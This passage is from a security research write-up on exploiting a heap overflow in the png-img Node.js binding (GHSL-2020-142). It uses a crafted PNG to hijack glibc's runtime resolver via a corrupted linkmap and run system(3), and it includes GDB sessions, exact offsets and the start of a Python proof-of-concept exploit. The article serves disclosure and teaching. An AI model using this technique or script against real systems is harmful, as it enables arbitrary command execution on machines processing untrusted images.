IS_MMAPPED flag: Off
NON_MAIN_ARENA flag: Off


gef➤  p *l
$7 = {
  l_addr = 0x7ffff400f000,
  l_name = 0x2718010 "/home/anticomputer/node_modules/png-img/build/Release/png_img.node",
  l_ld = 0x7ffff4271c40,
  l_next = 0x0,
  l_prev = 0x7ffff7ffd9f0 <_rtld_global+2448>,
  l_real = 0x2722a10,
  l_ns = 0x0,
  l_libname = 0x2722e88,
  l_info = {0x0, 0x7ffff4271c70, 0x7ffff4271d50, 0x7ffff4271d40, 0x0, 0x7ffff4271d00, 0x7ffff4271d10, 0x7ffff4271d80, 0x7ffff4271d90, 0x7ffff4271da0, 0x7ffff4271d20, 0x7ffff4271d30, 0x7ffff4271c90, 0x7ffff4271ca0, 0x7ffff4271c80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7ffff4271d60, 0x0, 0x0, 0x7ffff4271d70, 0x0, 0x7ffff4271cb0, 0x7ffff4271cd0, 0x7ffff4271cc0, 0x7ffff4271ce0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7ffff4271dc0, 0x7ffff4271db0, 0x0, 0x0, 0x0, 0x0, 0x7ffff4271de0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7ffff4271dd0, 0x0 <repeats 25 times>, 0x7ffff4271cf0},
...
}
gef➤

When we examine the addresses and sizes for both the png_ptr chunk and the linkmap chunk, we note that they are adjacent to each other in contiguous memory. The png_ptr chunk is located at address 0x2722ef0 and the linkmap chunk of size 0x4e0 is located right before it at address 0x2722a10. There are no chunks located in between the two in terms of contiguous memory.

When evaluating the heap state from an attacker perspective, we are always considering both the contiguous memory layout as well as the logical memory layout in terms of e.g. linked lists.

Because both the linkmap and the png_ptr allocations occur before we can start influencing the target node process, and they are both in use for the duration of our exploitation attempt, it seems unlikely that we’ll be able to wiggle our data_ chunk in between these two chunks for a unhindered corruption of the png_ptr data. It may be possible to influence the early heap state through e.g. PNG file sizes, but this seems unlikely to yield reliable results.

The implication here is that we’ll have to pursue the corruption of the linkmap to leverage our desired control over the node process.

Attacking the runtime resolver

As attackers we regularly have to distill unintended, yet useful, behaviors out of system code. The challenge here is to not get sidetracked by the things we don’t care about, and focus on leveraging the behaviors that serve us as an attacker in a given exploitation scenario.

So what are the behaviors of the runtime resolver code that might be useful to us as an attacker?

To answer this question we have to understand how the runtime resolver uses the linkmap. In a nutshell, it will grab the loaded library base address out of the linkmap, and then consult a variety of binary sections to determine the correct offset from the library base to the start address for the function to be resolved. Once it figures out what this offset is, it simply adds the offset to the library base, updates the GOT entry for the function with the resolved function address and jumps to the start of the resolved function.

As an attacker, we distill the following useful primitive out of this: providing a crafted linkmap to the dynamic linker’s runtime resolver lets us add two things together and redirect execution to the resulting address. The first operand of the addition is supplied directly from the linkmap, and the second operand to the addition is determined by indexing into binary sections for which we provide pointers from the linkmap. We note that the resolved value is written into a memory location prior to the execution being redirected, based on data contained in one of the dereferenced binary sections.

Subverting the dynamic linker for attacker purposes is not a new idea. So called “ret2dlresolve” attacks are a popular way of redirecting execution into a desired libc function without knowing where libc itself is located in memory. The concept was publicly discussed in Nergal’s “The advanced return-into-lib(c) exploits: PaX case study” Phrack paper.

When the PLT is at a known location for a targeted binary, as is the case with non-PIE binaries, ret2dlresolve attacks are an attractive option to redirect execution into arbitrary library offsets without having to know where the desired destination library is actually loaded into memory. The resolver code does the hard work for you.

The mainstream approach to abusing the runtime resolver generally assumes an attacker is already able to redirect execution for the process and is returning into the resolver code via the PLT to provide attacker controlled arguments to _dl_runtime_resolve. Hence the name “ret2dlresolve” (return to dl resolve). The idea being that they can then use the resolver’s interaction with existing or crafted linkmap data and relocation data to derive an attacker controlled offset to an existing pointer value in memory. For example, they may trick the resolver into applying an attacker controlled offset to an already established libc address to offset from there to an arbitrary libc function, such as system(3). Simpler variants use the resolver logic to resolve libc functions in scenarios where the libc base is not known and a direct return to libc is not possible.

Variations on this theme include providing a fully crafted linkmap at known locations in memory with relative addressing to fake relocation and symbol data. The goal, again, is to abuse the runtime resolver to offset from a known memory location into a location that the attacker wants to divert execution to.

However, while in our scenario we are able to provide a crafted linkmap, we do not control the arguments to the runtime resolver. We also do not have execution control yet, but rather aim to subvert the runtime resolver to provide us with both an ASLR bypass as well as execution redirection by means of our crafted linkmap data. Because the heap base is randomized and we are attacking the process through a PNG file with no way of leaking the location of our linkmap, the only memory layout and content assumptions we can make are based on the non-PIE node binary.

To get a better handle on how we might be able to achieve our attacker goals, let’s take a look at _dl_fixup as it’s intended to work. All code references are based on glibc-2.27.

elf/dl-runtime.c:


#ifndef reloc_offset
# define reloc_offset reloc_arg
# define reloc_index  reloc_arg / sizeof (PLTREL)
#endif


/* This function is called through a special trampoline from the PLT the
   first time each PLT entry is called.  We must perform the relocation
   specified in the PLT of the given shared object, and return the resolved
   function address to the trampoline, which will restart the original call
   to that address.  Future calls will bounce directly from the PLT to the
   function.  */


DL_FIXUP_VALUE_TYPE
attribute_hidden __attribute ((noinline)) ARCH_FIXUP_ATTRIBUTE
_dl_fixup (
# ifdef ELF_MACHINE_RUNTIME_FIXUP_ARGS
           ELF_MACHINE_RUNTIME_FIXUP_ARGS,
# endif
           struct link_map *l, ElfW(Word) reloc_arg)
{
  const ElfW(Sym) *const symtab
    = (const void *) D_PTR (l, l_info[DT_SYMTAB]);
  const char *strtab = (const void *) D_PTR (l, l_info[DT_STRTAB]);


[1]
  const PLTREL *const reloc
    = (const void *) (D_PTR (l, l_info[DT_JMPREL]) + reloc_offset);
[2]
  const ElfW(Sym) *sym = &symtab[ELFW(R_SYM) (reloc->r_info)];
  const ElfW(Sym) *refsym = sym;
[3]
  void *const rel_addr = (void *)(l->l_addr + reloc->r_offset);
  lookup_t result;
  DL_FIXUP_VALUE_TYPE value;


  /* Sanity check that we're really looking at a PLT relocation.  */
  assert (ELFW(R_TYPE)(reloc->r_info) == ELF_MACHINE_JMP_SLOT);


   /* Look up the target symbol.  If the normal lookup rules are not
      used don't look in the global scope.  */
  if (__builtin_expect (ELFW(ST_VISIBILITY) (sym->st_other), 0) == 0)
    {
      const struct r_found_version *version = NULL;


      if (l->l_info[VERSYMIDX (DT_VERSYM)] != NULL)
        {
          const ElfW(Half) *vernum =
            (const void *) D_PTR (l, l_info[VERSYMIDX (DT_VERSYM)]);
          ElfW(Half) ndx = vernum[ELFW(R_SYM) (reloc->r_info)] & 0x7fff;
          version = &l->l_versions[ndx];
          if (version->hash == 0)
            version = NULL;
        }


      /* We need to keep the scope around so do some locking.  This is
         not necessary for objects which cannot be unloaded or when
         we are not using any threads (yet).  */
      int flags = DL_LOOKUP_ADD_DEPENDENCY;
      if (!RTLD_SINGLE_THREAD_P)
        {
          THREAD_GSCOPE_SET_FLAG ();
          flags |= DL_LOOKUP_GSCOPE_LOCK;
        }


#ifdef RTLD_ENABLE_FOREIGN_CALL
      RTLD_ENABLE_FOREIGN_CALL;
#endif


      result = _dl_lookup_symbol_x (strtab + sym->st_name, l, &sym, l->l_scope,
                                    version, ELF_RTYPE_CLASS_PLT, flags, NULL);


      /* We are done with the global scope.  */
      if (!RTLD_SINGLE_THREAD_P)
        THREAD_GSCOPE_RESET_FLAG ();


#ifdef RTLD_FINALIZE_FOREIGN_CALL
      RTLD_FINALIZE_FOREIGN_CALL;
#endif


      /* Currently result contains the base load address (or link map)
         of the object that defines sym.  Now add in the symbol
         offset.  */
      value = DL_FIXUP_MAKE_VALUE (result,
                                   sym ? (LOOKUP_VALUE_ADDRESS (result)
                                          + sym->st_value) : 0);
    }
  else
    {
      /* We already found the symbol.  The module (and therefore its load
         address) is also known.  */
      value = DL_FIXUP_MAKE_VALUE (l, l->l_addr + sym->st_value);
      result = l;
    }


  /* And now perhaps the relocation addend.  */
  value = elf_machine_plt_value (l, reloc, value);


  if (sym != NULL
      && __builtin_expect (ELFW(ST_TYPE) (sym->st_info) == STT_GNU_IFUNC, 0))
    value = elf_ifunc_invoke (DL_FIXUP_VALUE_ADDR (value));


  /* Finally, fix up the plt itself.  */
  if (__glibc_unlikely (GLRO(dl_bind_not)))
    return value;


  return elf_machine_fixup_plt (l, result, refsym, sym, reloc, rel_addr, value);
}

While this code might look a little dense at first sight, the main thing for us to note is that _dl_fixup interacts with three main pointers from our controlled linkmap to resolve and relocate function addresses, all of which are pulled from the linkmap’s l_info array.

  1. l_info[DT_SYMTAB], which is a pointer to the .dynamic entry for a symbol table
  2. l_info[DT_STRTAB], which is a pointer to the .dynamic entry for a string table
  3. l_info[DT_JMPREL], which is a pointer to the .dynamic entry of an array of PLT relocation records

The .dynamic section of an Elf binary stores information about the various sections that the resolver needs to be able to get at. In our case the .dynstr (STRTAB), .dynsym (SYMTAB) and .rela.plt (JMPREL) sections are all required to resolve and relocate functions.

Dynamic entries are represented as the following structure:

typedef struct
{
  Elf64_Sxword d_tag;                        /* Dynamic entry type */
  union
    {
      Elf64_Xword d_val;                     /* Integer value */
      Elf64_Addr  d_ptr;                     /* Address value */
    } d_un;
} Elf64_Dyn;

The D_PTR macro used to access the l_info entries is defined as:

/* All references to the value of l_info[DT_PLTGOT],
  l_info[DT_STRTAB], l_info[DT_SYMTAB], l_info[DT_RELA],
  l_info[DT_REL], l_info[DT_JMPREL], and l_info[VERSYMIDX (DT_VERSYM)]
  have to be accessed via the D_PTR macro.  The macro is needed since for
  most architectures the entry is already relocated - but for some not
  and we need to relocate at access time.  */
#ifdef DL_RO_DYN_SECTION
# define D_PTR(map, i) ((map)->i->d_un.d_ptr + (map)->l_addr)
#else
# define D_PTR(map, i) (map)->i->d_un.d_ptr
#endif

Note that in most cases, D_PTR simply fetches the d_ptr field from the .dynamic section entry to retrieve the runtime relocated address of the section in question. For example, const char *strtab = (const void *) D_PTR (l, l_info[DT_STRTAB]); will follow the provided pointer to the .dynamic entry for the .dynstr (STRTAB) section at index DT_STRTAB of the l_info array and grab the d_ptr field of said entry.

That is a lot of back and forth in terms of pointers, but really what’s important for us to remember is that we’re not providing direct pointers to the various sections the resolver needs through our control of the l_info array in the linkmap, but rather pointers to (supposed) .dynamic entries which at offset +8 should contain a pointer to the section in question.

So now that we know how we may provide fake binary sections to the resolver from our crafted linkmap data, let’s take a quick look at the actual resolve and relocate logic in _dl_fixup.

Relocation records are defined as follows on our test platform:

elf.h:


typedef struct
{
  Elf64_Addr   r_offset;        /* Address */
  Elf64_Xword  r_info;            /* Relocation type and symbol index */
  Elf64_Sxword r_addend;        /* Addend */
} Elf64_Rela;

Symbols are defined as follows on our test platform:

elf.h:


typedef struct
{
  Elf64_Word    st_name;                /* Symbol name (string tbl index) */
  unsigned char st_info;                /* Symbol type and binding */
  unsigned char st_other;               /* Symbol visibility */
  Elf64_Section st_shndx;               /* Section index */
  Elf64_Addr    st_value;               /* Symbol value */
  Elf64_Xword   st_size;                /* Symbol size */
} Elf64_Sym;

We’ll refer back to the _dl_fixup code and note that at [1] the reloc_arg parameter to _dl_fixup is used as an index into the relocation record table to fetch a relocation record. This relocation record provides an reloc->r_info field which splits into a Symbol table index for its high 32bits and a relocation type for its low 32bits by way of a macro.

At [2] _dl_fixup fetches the appropriate symbol entry out of the symbol table using the relocation record’s reloc->r_info index, and pending an ELF_MACHINE_JMP_SLOT type assertion on reloc->r_info and a Symbol lookup scope check on sym->st_other, the actual function resolution takes place in a very straightforward way. First the function address is resolved by adding the l->l_addr field from the linkmap and the Symbol table entry’s sym->st_value field together. The resolved value is then written into rel_addr which is derived at [3] as the result of adding l->l_addr and reloc->r_offset together.

The l->l_addr field of the linkmap is supposed to hold the base address for the loaded library to which any resolved offsets are added.

To summarize, sym->st_value + l->l_addr is the address of the resolved function and l->l_addr + reloc->r_offset is the relocation target, i.e. the GOT entry, which is updated with the resolved function address.

So, from our attacker perspective, since we control l->l_addr, as well as the .dynamic section pointers to the symbol table and relocation records, we should be able to use this to redirect execution into something useful.

Caveats

We know we can fully control the linkmap, but we do not control the reloc_arg parameter passed via the hardcoded PLT arguments to the resolver code, which in our case is 0x11d (285) for png_error. This value is intended to be an index into the relocation section (.rela.plt) of the png-img module.

anticomputer@dc1:~$ readelf -r ~/node_modules/png-img/build/Release/png_img.node
…
Relocation section '.rela.plt' at offset 0x9410 contains 378 entries:
  Offset          Info           Type           Sym. Value    Sym. Name + Addend
…
000000263900  011000000007 R_X86_64_JUMP_SLO 000000000001cae0 png_error + 0
...

We also don’t know where in memory our corrupted linkmap lives. The heap base is randomized so the only known data we have available to us is due to the non-PIE nature of the node binary on our test platform. This prevents us from crafting fake sections at known locations in memory to use in conjunction with our crafted linkmap.

Caveats aside, we’ve now arrived at the fun part: strategizing about how we can combine our heap memory control with our knowledge of the resolver and the targeted binary to redirect execution.

We’ll make our stated goal to execute an arbitrary command as the result of loading a malicious PNG with png-img.

Brainstorming towards arbitrary command execution

We recall that the png_ptr chunk is adjacent to the linkmap chunk. The first field of the linkmap is the l_addr field, which is supposed to be the base address of the library to which the various relocation and function offsets are added.

We can overwrite heap data with a granularity of rowbytes, which is simply the width of our PNG image. The smallest rowbytes value that libpng will accept in combination with a wrapping height value is 3. That means that the smallest heap overwrite step we can take is 3 bytes per row iteration. We could, on a little endian platform, feasibly overwrite the least significant byte(s) of the linkmap’s l_addr field to make png_error resolve outside its intended function start address, without corrupting any of the other pointers in the linkmap. However, that precludes us from controlling the png_ptr argument at the time of the misaligned png_error call since controlling this data requires a full linkmap overwrite to reach it. As it turns out there are not enough useful instructions near png_error to pivot into control of the process otherwise. Due to ASLR we can not go for more aggressive partial overwrites of l_addr since we quickly collide into the entropy region of the library base address, and we only get a single try to succeed.

So, back to the drawing board.

Ideally we craft a scenario in which we can provide an arbitrary relocation record for the png_error reloc index of 285. This would then allow us to fully control the symbol index into a (fake) symbol table.

We could use node’s GOT section, which contains many already resolved libc pointers, as a fake symbol table, such that our crafted relocation record indexes into the node GOT in a way that grabs an existing libc address as a symbol’s sym->st_value. We can then use our control of l->l_addr to offset from this existing libc address and redirect execution to any other libc .text section address we desire.

Since we can control the png_ptr data which is loaded into the rdi register (i.e. the first argument according the System V AMD64 ABI in use on Linux 64bit intel platforms) at the time of the png_error resolve, we can feasibly resolve to system(3) and supply an arbitrary command to execute from our control of the png_ptr data.

Since the relocation offset for the final fixup would also be controlled from our crafted relocation record, we can simply account for the l->l_addr value being added to it and point it to some safe memory location to survive the relocation fixup before taking control of the process.

This would be an ideal scenario. The challenge is: how do we provide arbitrary relocation records when we do not have controlled data at known locations nor control over the reloc_arg?

A shaky eureka

One possible answer to our puzzle lies in the fact that l_info[DT_JMPREL] is obtained as a dereference via a pointer to the .dynamic section. If you recall we noted that the resolver does not obtain direct references to the various sections it needs access to, but rather grabs a pointer to the .dynamic entry for the desired section and then consults its d_ptr field to obtain the actual pointer to the section in question.

More plainly, the resolver will use our controlled pointer for l_info[DT_JMPREL] and at offset 8 from that pointer, it will grab another pointer value which is supposed to be the actual section address.

How does this help us?

Well, we said we can park the data_ chunk anywhere on the heap, but we were not able to reliably squeeze it in between the linkmap and png_ptr chunks. But what if we placed it somewhere far in front of the linkmap chunk? This would result in a considerable heap overwrite and subsequent control of heap contents.

At the time of exploitation, our heap interaction is limited in the sense that there are not many allocations or deallocations occurring. We are in a loop that simply writes rows of our controlled data across the heap until it runs out of row data, and then the resolver logic for png_error kicks in.

So, at least in our PoC scenario, we can effectively rewrite quite a bit of the heap right up until we need to take control without too many stability issues.

We also know that we’re dealing with a non-PIE binary. So we know where its .data section is located. In the node .data section there will exist a multitude of structures that may have pointers that point into the heap during runtime. If we overwrite a large enough section of the heap, some of those pointers will now point to data we control and those pointers will exist at static locations in the .data section.

So, what if we repurpose one of these .data locations to act as our .dynamic entry pointer for l_info[DT_JMPREL]? We might be able to use this to provide a fully controlled relocation record to _dl_fixup. Since on our target platform relocation records are size 24 (3 x 8 bytes), and the png_error reloc_arg is 285, as long as we can place a properly aligned relocation record at offset 285 x 24 from a node .data fetched heap pointer, we should be able to subvert the resolver logic.

Subsequently, we can use a similar approach to find a static location that at +8 contains a pointer to the node binary GOT, and use that as our l_info[DT_SYMTAB] .dynamic entry pointer. In concert with the crafted relocation record we can index into the node GOT to grab an existing libc pointer value, and use our crafted linkmap’s l_addr field as a delta to a desired libc function, in our case system(3).

Putting it all together

Now that we have a proposed exploitation strategy, we have to gather all the ingredients to put our plan of attack into action.

The downsides of our current strategy, from an exploitation reliability perspective, is that it is highly binary dependent, and highly heap layout sensitive. As such we mark this as a PoC effort at best. It depends on a non-PIE node binary, which is less and less common, as well as a predictable heap offset from the data_ chunks to the linkmap and png_ptr chunks.

Having said that, in terms of exploiting a blind, one shot, heap overflow on a reasonably modern system with most all standard mitigations turned on, it makes for a useful exercise to reach our desired finish line.

For our proposed strawberry pudding to come together, we need the following ingredients:

  1. A data_ chunk size that will park our overflow chunk in front of the linkmap chunk
  2. The offset between our data_ chunk and linkmap chunk
  3. A suitable libc pointer from the node binary GOT to offset from
  4. A known node pointer to a pointer to the node GOT base
  5. A known node pointer to a pointer to controlled heap memory
  6. The offset from the source libc pointer to our target libc function pointer
  7. A safe memory region to receive the final _dl_fixup relocation write

First let’s find a suitable free chunk that we can park our data_ chunk into at the time of the PngImg::PngImg constructor being invoked. We can use gef’s heap bins command to show us which bins have free chunks available and where in memory they are located.

We are looking for a chunk that’s at a significant offset from where the linkmap chunk will be, so that we have a good chance of being able to provide controlled reloc records from the heap via node .data heap pointers. But, we also don’t want to corrupt the entirety of the heap for fear of instability.

We can find a seemingly suitable free chunk of size 0x2010 in the unsorted bin:

─────────────────────────────────────── Unsorted Bin for arena 'main_arena' ───────────────────────────────────────[+] unsorted_bins[0]: fw=0x271f0b0, bk=0x272c610
 →   Chunk(addr=0x271f0c0, size=0x2010, flags=PREV_INUSE)   →   Chunk(addr=0x2722ef0, size=0x1b30, flags=PREV_INUSE)   →   Chunk(addr=0x2717400, size=0x430, flags=PREV_INUSE)   →   Chunk(addr=0x272c620, size=0x4450, flags=PREV_INUSE)
[+] Found 4 chunks in unsorted bin.

By setting data_ size to 0x2010, we can squeeze into this free chunk that lives at offset 0x3950 from what will ultimately be our linkmap chunk. Of course this assumption would be highly unstable in any real world scenario, but it’ll hold for the purposes of our exercise.

We’ll use a rowbytes (width) value of 16 so that we have a nicely aligned and granular write primitive for our heap overwrite.

We note that, since Symbol table entries are 24 bytes, and the st_value field is at offset 8 in the Symbol structure, the libc pointer we select from the node binary GOT that is acting as the st_value has to live at offset 8 from a 24 byte aligned index. For example, a relocation record specifying a Symtab index of 1 would imply fetching the value at offset 32 in the node GOT as the Symbol st_value.

We also note that the st_other field of our fake symbol entry decides whether or not we go down a more involved symbol lookup path in _dl_fixup based on symbol visibility. Since we like to keep things simple where possible, the GOT entry prior to the one populating our st_value field should fail the if (__builtin_expect (ELFW(ST_VISIBILITY) (sym->st_other), 0) == 0) check in _dl_fixup. This really just means that the lower 2 bits of the st_other field (byte 6) in our fake symbol table entry should not be 0. This requires some level of luck, but most GOT sections will contain pointers that will fit this requirement. The visibility checks are performed using the following macros:

elf.h:


/* How to extract and insert information held in the st_other field.  */
#define ELF32_ST_VISIBILITY(o)  ((o) & 0x03)


/* For ELF64 the definitions are the same.  */
#define ELF64_ST_VISIBILITY(o)  ELF32_ST_VISIBILITY (o)


/* Symbol visibility specification encoded in the st_other field.  */
#define STV_DEFAULT     0               /* Default symbol visibility rules */
#define STV_INTERNAL    1               /* Processor specific hidden class */
#define STV_HIDDEN      2               /* Sym unavailable in other modules */
#define STV_PROTECTED   3               /* Not preemptible, not exported */

On our test platform, the node binary GOT entry for getsockopt serves the purpose well. It is preceded by a pointer value that will fail the ST_VISIBILITY check, which saves us from having to service a much more involved resolver logic with our linkmap. So we will use getsockopt to offset to the desired system libc destination. The difference between these two libc offsets will be the delta value we set in our linkmaps l_addr field.

Let’s first gather all the address info we need from the node binary.

# grab the libc offsets of getsockopt and system using readelf -s,
anticomputer@dc1:~$ readelf -s /lib/x86_64-linux-gnu/libc-2.27.so
...
  1403: 000000000004f550    45 FUNC    WEAK   DEFAULT   13 system@@GLIBC_2.2.5
     959: 0000000000122830    36 FUNC    WEAK   DEFAULT   13 getsockopt@@GLIBC_2.2.5

# determine the node binary GOT entry for getsockopt with readelf -r
anticomputer@dc1:~$ readelf -r /usr/bin/node | grep getsockopt
00000264d8f8  011800000007 R_X86_64_JUMP_SLO 0000000000000000 getsockopt@GLIBC_2.2.5 + 0

# grab the node GOT section start address with readelf -t
anticomputer@dc1:~$ readelf -t /usr/bin/node
There are 40 section headers, starting at offset 0x274f120:

Section Headers:
  [Nr] Name
       Type              Address          Offset            Link
       Size              EntSize          Info              Align
       Flags
…
  [26] .got
       PROGBITS               PROGBITS         000000000264d038  000000000204d038  0
       0000000000000fc8 0000000000000008  0                 8
       [0000000000000003]: WRITE, ALLOC

Next we have to scour node’s .data section for a heap pointer that points into data we control at offset 285 x 24 (the reloc arg index). With a little GDB scripting we can quickly find candidates that fit the bill. Our script will search the node .data section to look for heap pointers that are in or near our region of controlled data.

Note: these heap addresses will change per-run with ASLR enabled, so this scripting example is only relevant to our snapshot debugging session. However, when going live with our exploitation attempt, due to the no-PIE node binary we can expect a consistent .data pointer location which we expect will contain a usable heap pointer for the context of the live attempt.

gef➤  set $c=(unsigned long long *)0x264c000
gef➤
gef➤  set $done=1
gef➤  while ($done)
 >if ((*$c&0xffffffffffff0000)==0x02720000)
  >set $done=0
  >end
 >set $c=$c+1
 >end
gef➤  p/x $c
$551 = 0x26598c8
gef➤  x/3gx (*($c-1))+285*24
0x2726508:      0x00007fff00000013      0x0000000000000000
0x2726518:      0x0000000000000021
gef➤  set $done=1
gef➤  while ($done)
 >if ((*$c&0xffffffffffff0000)==0x02720000)
  >set $done=0
  >end
 >set $c=$c+1
 >end
gef➤  p/x $c
$552 = 0x265b9e8
gef➤  x/3gx (*($c-1))+285*24
0x2722f10:      0x4141414141414141      0x4141414141414141
0x2722f20:      0x4141414141414141
gef➤  x/x 0x265b9e0
0x265b9e0 <_ZN4node9inspector12_GLOBAL__N_1L21start_io_thread_asyncE+32>:       0x0000000002721458
gef➤


So we found a potentially usable .data location (0x265b9e0) that will contain a heap pointer which at offset 285 x 24 will point to controlled data.

Finally, we have to find a location in the node binary that at +8 contains a pointer to node’s .got section. This is trivial to find, as the node binary will have references to its various binary sections.

objdump -h:
 25 .got          00000fc8  000000000264d038  000000000264d038  0204d038  2**3


(gdb) set $p=(unsigned long long *)0x400000 # search from node .text base upwards
(gdb) while (*$p!=0x000000000264d038)
 >set $p=$p+1
 >end
(gdb) x/x $p
0x244cf20:      0x000000000264d038
(gdb)


Now that we have gathered all our ingredients, we can write our final PoC exploit. To recap, we are going to construct a fake linkmap that adheres to the following constraints:

  1. The l_addr field will be a delta between libc’s getsockopt offset and libc’s system offset
  2. The l_info[DT_STRTAB] entry will be some valid pointer value, as we’re aiming to skip string based symbol lookups it just needs to be able to dereference safely
  3. The l_info[DT_SYMTAB] entry will be a pointer to a location that at +8 contains a pointer to the start of node’s .got section
  4. The l_info[DT_JMPREL] entry will be a pointer to a location that at +8 contains a heap pointer that points to a controlled fake relocation record at offset 285 x 24 based on the reloc_arg value for the png_error resolve

Our fake relocation record will supply an index into our fake symbol table (the node binary .got section) such that the symbol’s st_value field is the previously resolved libc pointer to getsockopt. It will also supply a relocation offset into a safe-to-write memory area so that we survive the final relocation write in _dl_fixup.

The resolver will add the libc delta we’ve set into the linkmap’s l_addr field to the fake symbol’s st_value field which contains the resolved getsockopt libc function pointer value. The result of this addition will be the libc address of the system(3) function.

Since we’ve also corrupted the png_ptr argument to png_error, when we finally jump into system(3) from the hijacked _dl_resolve for png_error, we are able to supply and execute arbitrary commands. For our PoC we will execute “touch /tmp/itworked”.

We prepare our exploit trigger PNG with our PoC exploit script and move the resulting PNG file into our debugging environment:

λ ~ › python3 x_trigger.py
λ ~ › file trigger.png
trigger.png: PNG image data, 16 x 268435968, 8-bit grayscale, non-interlaced
λ ~ ›  scp trigger.png anticomputer@builder:~/
trigger.png                                                                                                                                                                                          100% 1024     1.7MB/s   00:00
λ ~ ›

Let’s run the vulnerable node application inside of a debugger first, with a breakpoint set on system(3):

gef➤  r ~/pngimg.js
...
[#0] 0x7ffff6ac6fc0 → do_system(line=0x2722ef0 "touch /tmp/itworked #", 'P' <repeats 11 times>, "\340\"r\002")
[#1] 0x7ffff4030e63 → png_read_row()
[#2] 0x7ffff4032899 → png_read_image()
[#3] 0x7ffff40226d8 → PngImg::PngImg(char const*, unsigned long)()
[#4] 0x7ffff401c8fa → PngImgAdapter::New(Nan::FunctionCallbackInfo<v8::Value> const&)()
[#5] 0x7ffff401c56f → _ZN3Nan3impL23FunctionCallbackWrapperERKN2v820FunctionCallbackInfoINS1_5ValueEEE()
[#6] 0xb9041b → v8::internal::MaybeHandle<v8::internal::Object> v8::internal::(anonymous namespace)::HandleApiCallHelper<true>(v8::internal::Isolate*, v8::internal::Handle<v8::internal::HeapObject>, v8::internal::Handle<v8::internal::HeapObject>, v8::internal::Handle<v8::internal::FunctionTemplateInfo>, v8::internal::Handle<v8::internal::Object>, v8::internal::BuiltinArguments)()
[#7] 0xb9277d → v8::internal::Builtins::InvokeApiFunction(v8::internal::Isolate*, bool, v8::internal::Handle<v8::internal::HeapObject>, v8::internal::Handle<v8::internal::Object>, int, v8::internal::Handle<v8::internal::Object>*, v8::internal::Handle<v8::internal::HeapObject>)()
[#8] 0xea2cc1 → v8::internal::Execution::New(v8::internal::Isolate*, v8::internal::Handle<v8::internal::Object>, v8::internal::Handle<v8::internal::Object>, int, v8::internal::Handle<v8::internal::Object>*)()
[#9] 0xb28ed6 → v8::Function::NewInstanceWithSideEffectType(v8::Local<v8::Context>, int, v8::Local<v8::Value>*, v8::SideEffectType) const()
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────
Thread 1 "node" hit Breakpoint 1, do_system (line=0x2722ef0 "touch /tmp/itworked #", 'P' <repeats 11 times>, "\340\"r\002") at ../sysdeps/posix/system.c:56
56      {
gef➤  p "success!"
$1 = "success!"
gef➤

Great! Seems everything is working from our debugging session. Now let’s try it without a debugger attached.

anticomputer@dc1:~/glibc/glibc-2.27/elf$ rm /tmp/itworked
anticomputer@dc1:~/glibc/glibc-2.27/elf$ /usr/bin/node ~/pngimg.js
Segmentation fault (core dumped)
anticomputer@dc1:~/glibc/glibc-2.27/elf$ ls -alrt /tmp/itworked
-rw-rw-r-- 1 anticomputer anticomputer 0 Nov 23 20:53 /tmp/itworked
anticomputer@dc1:~/glibc/glibc-2.27/elf$

Even though we do crash the node process due to our heap corruption, it only crashes after our arbitrary command is executed.

Mission accomplished.

Our PoC exploitation journey is now complete. We have successfully established a full path to exploitation for the png-img FFI bug. While, from an attacker perspective, reliability remains a concern in terms of real world exploitation, this is sufficient for us to establish the potential impact of this vulnerability.

You can find the full exploit in Appendix A.

Conclusion

In this series we’ve taken you from a very high level introduction to the native attack surface of interpreted languages to the depths of exploitation of an actual Node.js FFI vulnerability. We restricted ourselves to only exploiting bugs that were introduced in the bindings themselves. The ultimate goal of this series was to demonstrate how memory safety vulnerabilities can creep into interpreted language applications via FFI based attack surface. We then took you on an exploit development journey to demonstrate how an attacker evaluates the bugs in your code for potential exploitation.

Appendix A - png-img PoC exploit

# PoC exploit for GHSL-2020-142, linkmap hijack demo


"""
anticomputer@dc1:~/glibc/glibc-2.27/elf$ uname -a
Linux dc1 4.15.0-122-generic #124-Ubuntu SMP Thu Oct 15 13:03:05 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux


anticomputer@dc1:~/glibc/glibc-2.27/elf$ node -v
v10.22.0


anticomputer@dc1:~/glibc/glibc-2.27/elf$ npm list png-img
/home/anticomputer
└── png-img@2.3.0


anticomputer@dc1:~/glibc/glibc-2.27/elf$ cat /etc/lsb-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=18.04
DISTRIB_CODENAME=bionic
DISTRIB_DESCRIPTION="Ubuntu 18.04.4 LTS"
"""


from PIL import Image
import os
import struct
import sys
import zlib


def patch(path, offset, data):
    f = open(path, 'r+b')
    f.seek(offset)
    f.write(data)
    f.close()


# libc binary info
libc_system_off = 0x000000000004f550
libc_getsockopt_off = 0x0000000000122830
libc_delta = (libc_system_off - libc_getsockopt_off) & 0xffffffffffffffff


# node binary info
node_getsockopt_got = 0x00000264d8f8
node_got_section_start = 0x000000000264d038
node_safe_ptr = 0x000000000264e000 + 0x1000


# calculate what our reloc index should be to align getsockopt as sym->st_value
node_reloc_index_wanted = int((node_getsockopt_got-node_got_section_start)/8) - 1
if node_reloc_index_wanted % 3:
    print("[x] node .got entry not aligned to reloc record size ...")
    sys.exit(0)
node_reloc_index = int(node_reloc_index_wanted/3)


# our l_info['DT_SYMTAB'] entry is pointer that at +8 has a pointer to node's got section
dt_symtab_p = 0x244cf20-8


# our l_info['DT_JMPREL'] entry is a pointer that at +8 has a heap pointer to our fake reloc records
dt_jmprel_p = 0x265b9e0-8


# our l_info['DT_STRTAB'] entry is just some valid pointer since we skip string lookups
dt_symtab_p = dt_symtab_p


# build our heap overwrite
trigger = 'trigger.png'
heap_rewrite = b''
# pixel bits is 8, set rowbytes to 16 via width
width = 0x10
heap_data_to_linkmap_off = 0x3950-0x10 # offset from data_ chunk to linkmap chunk
heap_data_chunk_size = 0x2010 # needs to be aligned on width
heap_linkmap_chunk_size = 0x4e0


# spray fake reloc records up until linkmap chunk data
fake_reloc_record = b''
fake_reloc_record += struct.pack('<Q', (node_safe_ptr - libc_delta) & 0xffffffffffffffff) # r_offset
fake_reloc_record += struct.pack('<Q', (node_reloc_index<<32) | 7) # r_info, type: ELF_MACHINE_JMP_SLOT
fake_reloc_record += struct.pack('<Q', 0xdeadc0dedeadc0de) # r_addend
